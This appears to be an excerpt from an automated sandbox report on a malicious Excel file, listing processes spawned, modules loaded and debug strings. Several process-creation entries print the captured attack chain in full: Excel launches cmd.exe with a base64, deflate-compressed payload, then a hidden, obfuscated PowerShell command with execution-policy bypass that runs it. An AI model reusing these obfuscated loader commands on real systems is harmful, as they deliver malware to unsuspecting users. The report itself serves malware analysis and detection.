Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l....... .A.8...A.Xw................a.Xw..0.....D...........<...........................t.........Ww........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l.........A.x...A.Xw................a.Xw..0.....D...........W.....................................Ww........
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlpJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7m
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD /c 'seT MXO= ^& ((gV '*mdR*').NAME[3,11,2]-jOIn'')( neW-oBjecT IO.ComprEssION.DeFlAtestreaM([iO.memoRyStREAm] [COnVeRt]::fROmbAsE64STriNG( 'VVpbqy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ua6j8io5.cmdline'Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESADE4.tmp' 'c:\Users\user\AppData\Local\Temp\CSCAD75.tmp'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3ndkwphw.cmdline'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSheLL -WindOWSTylE HIdDEn -NONiNteRAC -NoPrOfIlE -NOL -exeCUt bYpASS sv ( 'yUC'+ '5' ) ( [typE](\'{0}{3}{2}{1}\'-F 'e','eNt','ironm','nv' ) ) ;${EXECUTIOnCoNtEXt}.\'INvoKEco`mMa`ND\'.\'Invo`KEs`CRIPT\'( ( ( ITem ( 'vA'+ 'RiaBl' + 'E:' +'YuC5' ) ).ValUE::( \'{4}{5}{2}{0}{6}{3}{1}\' -f'me','E','on','rIabl','gETenvi','R','nTVa' ).Invoke('MXO',( \'{1}{0}\'-f's','ProCES' ) ) ) )
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\h2oah0u7.cmdline'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35F0.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3552.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES35FF.tmp' 'c:\Users\user\AppData\Local\Temp\CSC3553.tmp'
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbxxK3 source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp
Source: Binary string: Qkc:\Users\user\AppData\Local\Temp\ua6j8io5.pdb source: csc.exe, 00000005.00000002.1650949937.019BD000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdbn Files\Oracle;;~3 source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: tion.pdbL source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1674343739.019B0000.00000002.sdmp, powershell.exe, 00000009.00000002.1780905680.03FA0000.00000002.sdmp
Source: Binary string: Display this usage messageSSpecify debug information file name (default: output file name with .pdb extension)5### Visual C# 2005 Compiler Defect Report, created %s source: csc.exe, 00000005.00000002.1650835635.00360000.00000002.sdmp
Source: Binary string: mscorlib.pdbKK13 source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp
Source: Binary string: l\Temp\ua6j8io5.pdb18e3b_8.0.50727.4940_none_d08cc06a442b34 source: csc.exe, 00000005.00000002.1650699682.00209000.00000004.sdmp
Source: Binary string: wPkc:\Users\user\AppData\Local\Temp\ua6j8io5.pdb source: csc.exe, 00000005.00000003.1645423451.0032C000.00000004.sdmp
Source: Binary string: mscorlib.pdbjjfu source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp
Source: Binary string: indows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb=. source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1777244667.01BB8000.00000004.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Temp\ua6j8io5.pdb source: powershell.exe, 00000004.00000002.1679049173.04370000.00000004.sdmp, csc.exe, 00000005.00000003.1647057868.00232000.00000004.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Temp\3ndkwphw.pdb source: powershell.exe, 00000009.00000002.1781647232.04430000.00000004.sdmp
Source: Binary string: /C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllty Config\v2.0.50727.312\security.config.cch.4060.729296nagement.Automation.pdbs\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\Syste source: powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmp
Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbe source: powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: l\Temp\ua6j8io5.pdb18e3b_8.0.50727.4940_none_d08cc06a442b34& source: csc.exe, 00000005.00000003.1647115077.00209000.00000004.sdmp
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.1677585893.01CF0000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1679720516.0559D000.00000004.sdmp, powershell.exe, 00000009.00000002.1786286094.0690D000.00000004.sdmp

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
